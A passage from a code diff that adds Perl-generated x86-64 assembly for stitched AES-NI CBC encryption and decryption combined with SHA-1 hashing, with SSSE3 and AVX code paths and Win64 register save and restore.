+	movaps	96+112(%rsp),%xmm13
+	movaps	96+128(%rsp),%xmm14
+	movaps	96+144(%rsp),%xmm15
+___
+$code.=<<___;
+	lea	`104+($win64?10*16:0)`(%rsp),%rsi
+	mov	0(%rsi),%r15
+	mov	8(%rsi),%r14
+	mov	16(%rsi),%r13
+	mov	24(%rsi),%r12
+	mov	32(%rsi),%rbp
+	mov	40(%rsi),%rbx
+	lea	48(%rsi),%rsp
+.Lepilogue_ssse3:
+	ret
+.size	aesni_cbc_sha1_enc_ssse3,.-aesni_cbc_sha1_enc_ssse3
+___
+
+						if ($stitched_decrypt) {{{
+# reset
+($in0,$out,$len,$key,$ivp,$ctx,$inp)=("%rdi","%rsi","%rdx","%rcx","%r8","%r9","%r10");
+$j=$jj=$r=$rx=0;
+$Xi=4;
+
+# reassign for Atom Silvermont (see above)
+($inout0,$inout1,$inout2,$inout3,$rndkey0)=map("%xmm$_",(0..4));
+@X=map("%xmm$_",(8..13,6,7));
+@Tx=map("%xmm$_",(14,15,5));
+
+my @aes256_dec = (
+	'&movdqu($inout0,"0x00($in0)");',
+	'&movdqu($inout1,"0x10($in0)");	&pxor	($inout0,$rndkey0);',
+	'&movdqu($inout2,"0x20($in0)");	&pxor	($inout1,$rndkey0);',
+	'&movdqu($inout3,"0x30($in0)");	&pxor	($inout2,$rndkey0);',
+
+	'&pxor	($inout3,$rndkey0);	&movups	($rndkey0,"16-112($key)");',
+	'&movaps("64(%rsp)",@X[2]);',	# save IV, originally @X[3]
+	undef,undef
+	);
+for ($i=0;$i<13;$i++) {
+    push (@aes256_dec,(
+	'&aesdec	($inout0,$rndkey0);',
+	'&aesdec	($inout1,$rndkey0);',
+	'&aesdec	($inout2,$rndkey0);',
+	'&aesdec	($inout3,$rndkey0);	&movups($rndkey0,"'.(16*($i+2)-112).'($key)");'
+	));
+    push (@aes256_dec,(undef,undef))	if (($i>=3 && $i<=5) || $i>=11);
+    push (@aes256_dec,(undef,undef))	if ($i==5);
+}
+push(@aes256_dec,(
+	'&aesdeclast	($inout0,$rndkey0);	&movups	(@X[0],"0x00($in0)");',
+	'&aesdeclast	($inout1,$rndkey0);	&movups	(@X[1],"0x10($in0)");',
+	'&aesdeclast	($inout2,$rndkey0);	&movups	(@X[2],"0x20($in0)");',
+	'&aesdeclast	($inout3,$rndkey0);	&movups	(@X[3],"0x30($in0)");',
+
+	'&xorps		($inout0,"64(%rsp)");	&movdqu	($rndkey0,"-112($key)");',
+	'&xorps		($inout1,@X[0]);	&movups	("0x00($out,$in0)",$inout0);',
+	'&xorps		($inout2,@X[1]);	&movups	("0x10($out,$in0)",$inout1);',
+	'&xorps		($inout3,@X[2]);	&movups	("0x20($out,$in0)",$inout2);',
+
+	'&movups	("0x30($out,$in0)",$inout3);'
+	));
+
+sub body_00_19_dec () {	# ((c^d)&b)^d
+    # on start @T[0]=(c^d)&b
+    return &body_20_39_dec() if ($rx==19);
+
+    my @r=@body_00_19;
+
+	unshift (@r,@aes256_dec[$rx])	if (@aes256_dec[$rx]);
+	$rx++;
+
+    return @r;
+}
+
+sub body_20_39_dec () {	# b^d^c
+    # on entry @T[0]=b^d
+    return &body_40_59_dec() if ($rx==39);
+  
+    my @r=@body_20_39;
+
+	unshift (@r,@aes256_dec[$rx])	if (@aes256_dec[$rx]);
+	$rx++;
+
+    return @r;
+}
+
+sub body_40_59_dec () {	# ((b^c)&(c^d))^c
+    # on entry @T[0]=(b^c), (c^=d)
+
+    my @r=@body_40_59;
+
+	unshift (@r,@aes256_dec[$rx])	if (@aes256_dec[$rx]);
+	$rx++;
+
+    return @r;
+}
+
+$code.=<<___;
+.globl	aesni256_cbc_sha1_dec
+.type	aesni256_cbc_sha1_dec,\@abi-omnipotent
+.align	32
+aesni256_cbc_sha1_dec:
+	# caller should check for SSSE3 and AES-NI bits
+	mov	OPENSSL_ia32cap_P+0(%rip),%r10d
+	mov	OPENSSL_ia32cap_P+4(%rip),%r11d
+___
+$code.=<<___ if ($avx);
+	and	\$`1<<28`,%r11d		# mask AVX bit
+	and	\$`1<<30`,%r10d		# mask "Intel CPU" bit
+	or	%r11d,%r10d
+	cmp	\$`1<<28|1<<30`,%r10d
+	je	aesni256_cbc_sha1_dec_avx
+___
+$code.=<<___;
+	jmp	aesni256_cbc_sha1_dec_ssse3
+	ret
+.size	aesni256_cbc_sha1_dec,.-aesni256_cbc_sha1_dec
+
+.type	aesni256_cbc_sha1_dec_ssse3,\@function,6
+.align	32
+aesni256_cbc_sha1_dec_ssse3:
+	mov	`($win64?56:8)`(%rsp),$inp	# load 7th argument
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+	lea	`-104-($win64?10*16:0)`(%rsp),%rsp
+___
+$code.=<<___ if ($win64);
+	movaps	%xmm6,96+0(%rsp)
+	movaps	%xmm7,96+16(%rsp)
+	movaps	%xmm8,96+32(%rsp)
+	movaps	%xmm9,96+48(%rsp)
+	movaps	%xmm10,96+64(%rsp)
+	movaps	%xmm11,96+80(%rsp)
+	movaps	%xmm12,96+96(%rsp)
+	movaps	%xmm13,96+112(%rsp)
+	movaps	%xmm14,96+128(%rsp)
+	movaps	%xmm15,96+144(%rsp)
+.Lprologue_dec_ssse3:
+___
+$code.=<<___;
+	mov	$in0,%r12			# reassign arguments
+	mov	$out,%r13
+	mov	$len,%r14
+	lea	112($key),%r15			# size optimization
+	movdqu	($ivp),@X[3]			# load IV
+	#mov	$ivp,88(%rsp)			# save $ivp
+___
+($in0,$out,$len,$key)=map("%r$_",(12..15));	# reassign arguments
+$code.=<<___;
+	shl	\$6,$len
+	sub	$in0,$out
+	add	$inp,$len		# end of input
+
+	lea	K_XX_XX(%rip),$K_XX_XX
+	mov	0($ctx),$A		# load context
+	mov	4($ctx),$B
+	mov	8($ctx),$C
+	mov	12($ctx),$D
+	mov	$B,@T[0]		# magic seed
+	mov	16($ctx),$E
+	mov	$C,@T[1]
+	xor	$D,@T[1]
+	and	@T[1],@T[0]
+
+	movdqa	64($K_XX_XX),@Tx[2]	# pbswap mask
+	movdqa	0($K_XX_XX),@Tx[1]	# K_00_19
+	movdqu	0($inp),@X[-4&7]	# load input to %xmm[0-3]
+	movdqu	16($inp),@X[-3&7]
+	movdqu	32($inp),@X[-2&7]
+	movdqu	48($inp),@X[-1&7]
+	pshufb	@Tx[2],@X[-4&7]		# byte swap
+	add	\$64,$inp
+	pshufb	@Tx[2],@X[-3&7]
+	pshufb	@Tx[2],@X[-2&7]
+	pshufb	@Tx[2],@X[-1&7]
+	paddd	@Tx[1],@X[-4&7]		# add K_00_19
+	paddd	@Tx[1],@X[-3&7]
+	paddd	@Tx[1],@X[-2&7]
+	movdqa	@X[-4&7],0(%rsp)	# X[]+K xfer to IALU
+	psubd	@Tx[1],@X[-4&7]		# restore X[]
+	movdqa	@X[-3&7],16(%rsp)
+	psubd	@Tx[1],@X[-3&7]
+	movdqa	@X[-2&7],32(%rsp)
+	psubd	@Tx[1],@X[-2&7]
+	movdqu	-112($key),$rndkey0	# $key[0]
+	jmp	.Loop_dec_ssse3
+
+.align	32
+.Loop_dec_ssse3:
+___
+	&Xupdate_ssse3_16_31(\&body_00_19_dec);
+	&Xupdate_ssse3_16_31(\&body_00_19_dec);
+	&Xupdate_ssse3_16_31(\&body_00_19_dec);
+	&Xupdate_ssse3_16_31(\&body_00_19_dec);
+	&Xupdate_ssse3_32_79(\&body_00_19_dec);
+	&Xupdate_ssse3_32_79(\&body_20_39_dec);
+	&Xupdate_ssse3_32_79(\&body_20_39_dec);
+	&Xupdate_ssse3_32_79(\&body_20_39_dec);
+	&Xupdate_ssse3_32_79(\&body_20_39_dec);
+	&Xupdate_ssse3_32_79(\&body_20_39_dec);
+	&Xupdate_ssse3_32_79(\&body_40_59_dec);
+	&Xupdate_ssse3_32_79(\&body_40_59_dec);
+	&Xupdate_ssse3_32_79(\&body_40_59_dec);
+	&Xupdate_ssse3_32_79(\&body_40_59_dec);
+	&Xupdate_ssse3_32_79(\&body_40_59_dec);
+	&Xupdate_ssse3_32_79(\&body_20_39_dec);
+	&Xuplast_ssse3_80(\&body_20_39_dec,".Ldone_dec_ssse3");	# can jump to "done"
+
+				$saved_j=$j;   @saved_V=@V;
+				$saved_rx=$rx;
+
+	&Xloop_ssse3(\&body_20_39_dec);
+	&Xloop_ssse3(\&body_20_39_dec);
+	&Xloop_ssse3(\&body_20_39_dec);
+
+	eval(@aes256_dec[-1]);			# last store
+$code.=<<___;
+	lea	64($in0),$in0
+
+	add	0($ctx),$A			# update context
+	add	4($ctx),@T[0]
+	add	8($ctx),$C
+	add	12($ctx),$D
+	mov	$A,0($ctx)
+	add	16($ctx),$E
+	mov	@T[0],4($ctx)
+	mov	@T[0],$B			# magic seed
+	mov	$C,8($ctx)
+	mov	$C,@T[1]
+	mov	$D,12($ctx)
+	xor	$D,@T[1]
+	mov	$E,16($ctx)
+	and	@T[1],@T[0]
+	jmp	.Loop_dec_ssse3
+
+.Ldone_dec_ssse3:
+___
+				$jj=$j=$saved_j; @V=@saved_V;
+				$rx=$saved_rx;
+
+	&Xtail_ssse3(\&body_20_39_dec);
+	&Xtail_ssse3(\&body_20_39_dec);
+	&Xtail_ssse3(\&body_20_39_dec);
+
+	eval(@aes256_dec[-1]);			# last store
+$code.=<<___;
+	add	0($ctx),$A			# update context
+	add	4($ctx),@T[0]
+	add	8($ctx),$C
+	mov	$A,0($ctx)
+	add	12($ctx),$D
+	mov	@T[0],4($ctx)
+	add	16($ctx),$E
+	mov	$C,8($ctx)
+	mov	$D,12($ctx)
+	mov	$E,16($ctx)
+	movups	@X[3],($ivp)			# write IV
+___
+$code.=<<___ if ($win64);
+	movaps	96+0(%rsp),%xmm6
+	movaps	96+16(%rsp),%xmm7
+	movaps	96+32(%rsp),%xmm8
+	movaps	96+48(%rsp),%xmm9
+	movaps	96+64(%rsp),%xmm10
+	movaps	96+80(%rsp),%xmm11
+	movaps	96+96(%rsp),%xmm12
+	movaps	96+112(%rsp),%xmm13
+	movaps	96+128(%rsp),%xmm14
+	movaps	96+144(%rsp),%xmm15
+___
+$code.=<<___;
+	lea	`104+($win64?10*16:0)`(%rsp),%rsi
+	mov	0(%rsi),%r15
+	mov	8(%rsi),%r14
+	mov	16(%rsi),%r13
+	mov	24(%rsi),%r12
+	mov	32(%rsi),%rbp
+	mov	40(%rsi),%rbx
+	lea	48(%rsi),%rsp
+.Lepilogue_dec_ssse3:
+	ret
+.size	aesni256_cbc_sha1_dec_ssse3,.-aesni256_cbc_sha1_dec_ssse3
+___
+						}}}
+$j=$jj=$r=$rx=0;
+
+if ($avx) {
+my ($in0,$out,$len,$key,$ivp,$ctx,$inp)=("%rdi","%rsi","%rdx","%rcx","%r8","%r9","%r10");
+
+my $Xi=4;
+my @X=map("%xmm$_",(4..7,0..3));
+my @Tx=map("%xmm$_",(8..10));
+my @V=($A,$B,$C,$D,$E)=("%eax","%ebx","%ecx","%edx","%ebp");	# size optimization
+my @T=("%esi","%edi");
+my ($rndkey0,$iv,$in)=map("%xmm$_",(11..13));
+my @rndkey=("%xmm14","%xmm15");
+my ($inout0,$inout1,$inout2,$inout3)=map("%xmm$_",(12..15));	# for dec
+my $Kx=@Tx[2];
+
+my $_rol=sub { &shld(@_[0],@_) };
+my $_ror=sub { &shrd(@_[0],@_) };
+
+$code.=<<___;
+.type	aesni_cbc_sha1_enc_avx,\@function,6
+.align	32
+aesni_cbc_sha1_enc_avx:
+	mov	`($win64?56:8)`(%rsp),$inp	# load 7th argument
+	#shr	\$6,$len			# debugging artefact
+	#jz	.Lepilogue_avx			# debugging artefact
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+	lea	`-104-($win64?10*16:0)`(%rsp),%rsp
+	#mov	$in0,$inp			# debugging artefact
+	#lea	64(%rsp),$ctx			# debugging artefact
+___
+$code.=<<___ if ($win64);
+	movaps	%xmm6,96+0(%rsp)
+	movaps	%xmm7,96+16(%rsp)
+	movaps	%xmm8,96+32(%rsp)
+	movaps	%xmm9,96+48(%rsp)
+	movaps	%xmm10,96+64(%rsp)
+	movaps	%xmm11,96+80(%rsp)
+	movaps	%xmm12,96+96(%rsp)
+	movaps	%xmm13,96+112(%rsp)
+	movaps	%xmm14,96+128(%rsp)
+	movaps	%xmm15,96+144(%rsp)
+.Lprologue_avx:
+___
+$code.=<<___;
+	vzeroall
+	mov	$in0,%r12			# reassign arguments
+	mov	$out,%r13
+	mov	$len,%r14
+	lea	112($key),%r15			# size optimization
+	vmovdqu	($ivp),$iv			# load IV
+	mov	$ivp,88(%rsp)			# save $ivp
+___
+($in0,$out,$len,$key)=map("%r$_",(12..15));	# reassign arguments
+my $rounds="${ivp}d";
+$code.=<<___;
+	shl	\$6,$len
+	sub	$in0,$out
+	mov	240-112($key),$rounds
+	add	$inp,$len		# end of input
+
+	lea	K_XX_XX(%rip),$K_XX_XX
+	mov	0($ctx),$A		# load context
+	mov	4($ctx),$B
+	mov	8($ctx),$C
+	mov	12($ctx),$D
+	mov	$B,@T[0]		# magic seed
+	mov	16($ctx),$E
+	mov	$C,@T[1]
+	xor	$D,@T[1]
+	and	@T[1],@T[0]
+
+	vmovdqa	64($K_XX_XX),@X[2]	# pbswap mask
+	vmovdqa	0($K_XX_XX),$Kx		# K_00_19
+	vmovdqu	0($inp),@X[-4&7]	# load input to %xmm[0-3]
+	vmovdqu	16($inp),@X[-3&7]
+	vmovdqu	32($inp),@X[-2&7]
+	vmovdqu	48($inp),@X[-1&7]
+	vpshufb	@X[2],@X[-4&7],@X[-4&7]	# byte swap
+	add	\$64,$inp
+	vpshufb	@X[2],@X[-3&7],@X[-3&7]
+	vpshufb	@X[2],@X[-2&7],@X[-2&7]
+	vpshufb	@X[2],@X[-1&7],@X[-1&7]
+	vpaddd	$Kx,@X[-4&7],@X[0]	# add K_00_19
+	vpaddd	$Kx,@X[-3&7],@X[1]
+	vpaddd	$Kx,@X[-2&7],@X[2]
+	vmovdqa	@X[0],0(%rsp)		# X[]+K xfer to IALU
+	vmovdqa	@X[1],16(%rsp)
+	vmovdqa	@X[2],32(%rsp)
+	vmovups	-112($key),$rndkey[1]	# $key[0]
+	vmovups	16-112($key),$rndkey[0]	# forward reference
+	jmp	.Loop_avx
+___
+
+my $aesenc=sub {
+  use integer;
+  my ($n,$k)=($r/10,$r%10);
+    if ($k==0) {
+      $code.=<<___;
+	vmovdqu		`16*$n`($in0),$in		# load input
+	vpxor		$rndkey[1],$in,$in
+___
+      $code.=<<___ if ($n);
+	vmovups		$iv,`16*($n-1)`($out,$in0)	# write output
+___
+      $code.=<<___;
+	vpxor		$in,$iv,$iv
+	vaesenc		$rndkey[0],$iv,$iv
+	vmovups		`32+16*$k-112`($key),$rndkey[1]
+___
+    } elsif ($k==9) {
+      $sn++;
+      $code.=<<___;
+	cmp		\$11,$rounds
+	jb		.Lvaesenclast$sn
+	vaesenc		$rndkey[0],$iv,$iv
+	vmovups		`32+16*($k+0)-112`($key),$rndkey[1]
+	vaesenc		$rndkey[1],$iv,$iv
+	vmovups		`32+16*($k+1)-112`($key),$rndkey[0]
+	je		.Lvaesenclast$sn
+	vaesenc		$rndkey[0],$iv,$iv
+	vmovups		`32+16*($k+2)-112`($key),$rndkey[1]
+	vaesenc		$rndkey[1],$iv,$iv
+	vmovups		`32+16*($k+3)-112`($key),$rndkey[0]
+.Lvaesenclast$sn:
+	vaesenclast	$rndkey[0],$iv,$iv
+	vmovups		-112($key),$rndkey[0]
+	vmovups		16-112($key),$rndkey[1]		# forward reference
+___
+    } else {
+      $code.=<<___;
+	vaesenc		$rndkey[0],$iv,$iv
+	vmovups		`32+16*$k-112`($key),$rndkey[1]
+___
+    }
+    $r++;	unshift(@rndkey,pop(@rndkey));
+};
+
+sub Xupdate_avx_16_31()		# recall that $Xi starts wtih 4
+{ use integer;
+  my $body = shift;
+  my @insns = (&$body,&$body,&$body,&$body);	# 40 instructions
+  my ($a,$b,$c,$d,$e);
+
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&vpalignr(@X[0],@X[-3&7],@X[-4&7],8);	# compose "X[-14]" in "X[0]"
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	  &vpaddd	(@Tx[1],$Kx,@X[-1&7]);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&vpsrldq(@Tx[0],@X[-1&7],4);		# "X[-3]", 3 dwords
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&vpxor	(@X[0],@X[0],@X[-4&7]);		# "X[0]"^="X[-16]"
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	&vpxor	(@Tx[0],@Tx[0],@X[-2&7]);	# "X[-3]"^"X[-8]"
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	&vpxor	(@X[0],@X[0],@Tx[0]);		# "X[0]"^="X[-3]"^"X[-8]"
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	  &vmovdqa	(eval(16*(($Xi-1)&3))."(%rsp)",@Tx[1]);	# X[]+K xfer to IALU
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	&vpsrld	(@Tx[0],@X[0],31);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	&vpslldq(@Tx[1],@X[0],12);		# "X[0]"<<96, extract one dword
+	&vpaddd	(@X[0],@X[0],@X[0]);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	&vpor	(@X[0],@X[0],@Tx[0]);		# "X[0]"<<<=1
+	&vpsrld	(@Tx[0],@Tx[1],30);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	&vpslld	(@Tx[1],@Tx[1],2);
+	&vpxor	(@X[0],@X[0],@Tx[0]);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	&vpxor	(@X[0],@X[0],@Tx[1]);		# "X[0]"^=("X[0]">>96)<<<2
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	  &vmovdqa	($Kx,eval(16*(($Xi)/5))."($K_XX_XX)")	if ($Xi%5==0);	# K_XX_XX
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+
+	 foreach (@insns) { eval; }	# remaining instructions [if any]
+
+  $Xi++;	push(@X,shift(@X));	# "rotate" X[]
+}
+
+sub Xupdate_avx_32_79()
+{ use integer;
+  my $body = shift;
+  my @insns = (&$body,&$body,&$body,&$body);	# 32 to 48 instructions
+  my ($a,$b,$c,$d,$e);
+
+	&vpalignr(@Tx[0],@X[-1&7],@X[-2&7],8);	# compose "X[-6]"
+	&vpxor	(@X[0],@X[0],@X[-4&7]);		# "X[0]"="X[-32]"^"X[-16]"
+	 eval(shift(@insns));		# body_20_39
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));		# rol
+
+	&vpxor	(@X[0],@X[0],@X[-7&7]);		# "X[0]"^="X[-28]"
+	 eval(shift(@insns));
+	 eval(shift(@insns))	if (@insns[0] !~ /&ro[rl]/);
+	  &vpaddd	(@Tx[1],$Kx,@X[-1&7]);
+	  &vmovdqa	($Kx,eval(16*($Xi/5))."($K_XX_XX)")	if ($Xi%5==0);
+	 eval(shift(@insns));		# ror
+	 eval(shift(@insns));
+
+	&vpxor	(@X[0],@X[0],@Tx[0]);		# "X[0]"^="X[-6]"
+	 eval(shift(@insns));		# body_20_39
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));		# rol
+
+	&vpsrld	(@Tx[0],@X[0],30);
+	  &vmovdqa	(eval(16*(($Xi-1)&3))."(%rsp)",@Tx[1]);	# X[]+K xfer to IALU
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));		# ror
+	 eval(shift(@insns));
+
+	&vpslld	(@X[0],@X[0],2);
+	 eval(shift(@insns));		# body_20_39
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));		# rol
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));		# ror
+	 eval(shift(@insns));
+
+	&vpor	(@X[0],@X[0],@Tx[0]);		# "X[0]"<<<=2
+	 eval(shift(@insns));		# body_20_39
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));		# rol
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));		# rol
+	 eval(shift(@insns));
+
+	 foreach (@insns) { eval; }	# remaining instructions
+
+  $Xi++;	push(@X,shift(@X));	# "rotate" X[]
+}
+
+sub Xuplast_avx_80()
+{ use integer;
+  my $body = shift;
+  my @insns = (&$body,&$body,&$body,&$body);	# 32 instructions
+  my ($a,$b,$c,$d,$e);
+
+	 eval(shift(@insns));
+	  &vpaddd	(@Tx[1],$Kx,@X[-1&7]);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	  &vmovdqa	(eval(16*(($Xi-1)&3))."(%rsp)",@Tx[1]);	# X[]+K xfer IALU
+
+	 foreach (@insns) { eval; }		# remaining instructions
+
+	&cmp	($inp,$len);
+	&je	(shift);
+
+	&vmovdqa(@Tx[1],"64($K_XX_XX)");	# pbswap mask
+	&vmovdqa($Kx,"0($K_XX_XX)");		# K_00_19
+	&vmovdqu(@X[-4&7],"0($inp)");		# load input
+	&vmovdqu(@X[-3&7],"16($inp)");
+	&vmovdqu(@X[-2&7],"32($inp)");
+	&vmovdqu(@X[-1&7],"48($inp)");
+	&vpshufb(@X[-4&7],@X[-4&7],@Tx[1]);	# byte swap
+	&add	($inp,64);
+
+  $Xi=0;
+}
+
+sub Xloop_avx()
+{ use integer;
+  my $body = shift;
+  my @insns = (&$body,&$body,&$body,&$body);	# 32 instructions
+  my ($a,$b,$c,$d,$e);
+
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&vpshufb(@X[($Xi-3)&7],@X[($Xi-3)&7],@Tx[1]);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&vpaddd	(@Tx[0],@X[($Xi-4)&7],$Kx);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&vmovdqa(eval(16*$Xi)."(%rsp)",@Tx[0]);	# X[]+K xfer to IALU
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	foreach (@insns) { eval; }
+  $Xi++;
+}
+
+sub Xtail_avx()
+{ use integer;
+  my $body = shift;
+  my @insns = (&$body,&$body,&$body,&$body);	# 32 instructions
+  my ($a,$b,$c,$d,$e);
+
+	foreach (@insns) { eval; }
+}
+
+$code.=<<___;
+.align	32
+.Loop_avx:
+___
+	&Xupdate_avx_16_31(\&body_00_19);
+	&Xupdate_avx_16_31(\&body_00_19);
+	&Xupdate_avx_16_31(\&body_00_19);
+	&Xupdate_avx_16_31(\&body_00_19);
+	&Xupdate_avx_32_79(\&body_00_19);
+	&Xupdate_avx_32_79(\&body_20_39);
+	&Xupdate_avx_32_79(\&body_20_39);
+	&Xupdate_avx_32_79(\&body_20_39);
+	&Xupdate_avx_32_79(\&body_20_39);
+	&Xupdate_avx_32_79(\&body_20_39);
+	&Xupdate_avx_32_79(\&body_40_59);
+	&Xupdate_avx_32_79(\&body_40_59);
+	&Xupdate_avx_32_79(\&body_40_59);
+	&Xupdate_avx_32_79(\&body_40_59);
+	&Xupdate_avx_32_79(\&body_40_59);
+	&Xupdate_avx_32_79(\&body_20_39);
+	&Xuplast_avx_80(\&body_20_39,".Ldone_avx");	# can jump to "done"
+
+				$saved_j=$j; @saved_V=@V;
+				$saved_r=$r; @saved_rndkey=@rndkey;
+
+	&Xloop_avx(\&body_20_39);
+	&Xloop_avx(\&body_20_39);
+	&Xloop_avx(\&body_20_39);
+
+$code.=<<___;
+	vmovups	$iv,48($out,$in0)		# write output
+	lea	64($in0),$in0
+
+	add	0($ctx),$A			# update context
+	add	4($ctx),@T[0]
+	add	8($ctx),$C
+	add	12($ctx),$D
+	mov	$A,0($ctx)
+	add	16($ctx),$E
+	mov	@T[0],4($ctx)
+	mov	@T[0],$B			# magic seed
+	mov	$C,8($ctx)
+	mov	$C,@T[1]
+	mov	$D,12($ctx)
+	xor	$D,@T[1]
+	mov	$E,16($ctx)
+	and	@T[1],@T[0]
+	jmp	.Loop_avx
+
+.Ldone_avx:
+___
+				$jj=$j=$saved_j; @V=@saved_V;
+				$r=$saved_r;     @rndkey=@saved_rndkey;
+
+	&Xtail_avx(\&body_20_39);
+	&Xtail_avx(\&body_20_39);
+	&Xtail_avx(\&body_20_39);
+
+$code.=<<___;
+	vmovups	$iv,48($out,$in0)		# write output
+	mov	88(%rsp),$ivp			# restore $ivp
+
+	add	0($ctx),$A			# update context
+	add	4($ctx),@T[0]
+	add	8($ctx),$C
+	mov	$A,0($ctx)
+	add	12($ctx),$D
+	mov	@T[0],4($ctx)
+	add	16($ctx),$E
+	mov	$C,8($ctx)
+	mov	$D,12($ctx)
+	mov	$E,16($ctx)
+	vmovups	$iv,($ivp)			# write IV
+	vzeroall
+___
+$code.=<<___ if ($win64);
+	movaps	96+0(%rsp),%xmm6
+	movaps	96+16(%rsp),%xmm7
+	movaps	96+32(%rsp),%xmm8
+	movaps	96+48(%rsp),%xmm9
+	movaps	96+64(%rsp),%xmm10
+	movaps	96+80(%rsp),%xmm11
+	movaps	96+96(%rsp),%xmm12
+	movaps	96+112(%rsp),%xmm13
+	movaps	96+128(%rsp),%xmm14
+	movaps	96+144(%rsp),%xmm15
+___
+$code.=<<___;
+	lea	`104+($win64?10*16:0)`(%rsp),%rsi
+	mov	0(%rsi),%r15
+	mov	8(%rsi),%r14
+	mov	16(%rsi),%r13
+	mov	24(%rsi),%r12
+	mov	32(%rsi),%rbp
+	mov	40(%rsi),%rbx
+	lea	48(%rsi),%rsp
+.Lepilogue_avx:
+	ret
+.size	aesni_cbc_sha1_enc_avx,.-aesni_cbc_sha1_enc_avx
+___
+
+						if ($stitched_decrypt) {{{
+# reset
+($in0,$out,$len,$key,$ivp,$ctx,$inp)=("%rdi","%rsi","%rdx","%rcx","%r8","%r9","%r10");
+
+$j=$jj=$r=$rx=0;
+$Xi=4;
+
+@aes256_dec = (
+	'&vpxor	($inout0,$rndkey0,"0x00($in0)");',
+	'&vpxor	($inout1,$rndkey0,"0x10($in0)");',
+	'&vpxor	($inout2,$rndkey0,"0x20($in0)");',
+	'&vpxor	($inout3,$rndkey0,"0x30($in0)");',
+
+	'&vmovups($rndkey0,"16-112($key)");',
+	'&vmovups("64(%rsp)",@X[2]);',		# save IV, originally @X[3]
+	undef,undef
+	);
+for ($i=0;$i<13;$i++) {
+    push (@aes256_dec,(
+	'&vaesdec	($inout0,$inout0,$rndkey0);',
+	'&vaesdec	($inout1,$inout1,$rndkey0);',
+	'&vaesdec	($inout2,$inout2,$rndkey0);',
+	'&vaesdec	($inout3,$inout3,$rndkey0);	&vmovups($rndkey0,"'.(16*($i+2)-112).'($key)");'
+	));
+    push (@aes256_dec,(undef,undef))	if (($i>=3 && $i<=5) || $i>=11);
+    push (@aes256_dec,(undef,undef))	if ($i==5);
+}
+push(@aes256_dec,(
+	'&vaesdeclast	($inout0,$inout0,$rndkey0);	&vmovups(@X[0],"0x00($in0)");',
+	'&vaesdeclast	($inout1,$inout1,$rndkey0);	&vmovups(@X[1],"0x10($in0)");',
+	'&vaesdeclast	($inout2,$inout2,$rndkey0);	&vmovups(@X[2],"0x20($in0)");',
+	'&vaesdeclast	($inout3,$inout3,$rndkey0);	&vmovups(@X[3],"0x30($in0)");',
+
+	'&vxorps	($inout0,$inout0,"64(%rsp)");	&vmovdqu($rndkey0,"-112($key)");',
+	'&vxorps	($inout1,$inout1,@X[0]);	&vmovups("0x00($out,$in0)",$inout0);',
+	'&vxorps	($inout2,$inout2,@X[1]);	&vmovups("0x10($out,$in0)",$inout1);',
+	'&vxorps	($inout3,$inout3,@X[2]);	&vmovups("0x20($out,$in0)",$inout2);',
+
+	'&vmovups	("0x30($out,$in0)",$inout3);'
+	));
+
+$code.=<<___;
+.type	aesni256_cbc_sha1_dec_avx,\@function,6
+.align	32
+aesni256_cbc_sha1_dec_avx:
+	mov	`($win64?56:8)`(%rsp),$inp	# load 7th argument
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+	lea	`-104-($win64?10*16:0)`(%rsp),%rsp
+___
+$code.=<<___ if ($win64);
+	movaps	%xmm6,96+0(%rsp)
+	movaps	%xmm7,96+16(%rsp)
+	movaps	%xmm8,96+32(%rsp)
+	movaps	%xmm9,96+48(%rsp)
+	movaps	%xmm10,96+64(%rsp)
+	movaps	%xmm11,96+80(%rsp)
+	movaps	%xmm12,96+96(%rsp)
+	movaps	%xmm13,96+112(%rsp)
+	movaps	%xmm14,96+128(%rsp)
+	movaps	%xmm15,96+144(%rsp)
+.Lprologue_dec_avx:
+___
+$code.=<<___;
+	vzeroall
+	mov	$in0,%r12			# reassign arguments
+	mov	$out,%r13
+	mov	$len,%r14
+	lea	112($key),%r15			# size optimization
+	vmovdqu	($ivp),@X[3]			# load IV
+___
+($in0,$out,$len,$key)=map("%r$_",(12..15));	# reassign arguments
+$code.=<<___;
+	shl	\$6,$len
+	sub	$in0,$out
+	add	$inp,$len		# end of input
+
+	lea	K_XX_XX(%rip),$K_XX_XX
+	mov	0($ctx),$A		# load context
+	mov	4($ctx),$B
+	mov	8($ctx),$C
+	mov	12($ctx),$D
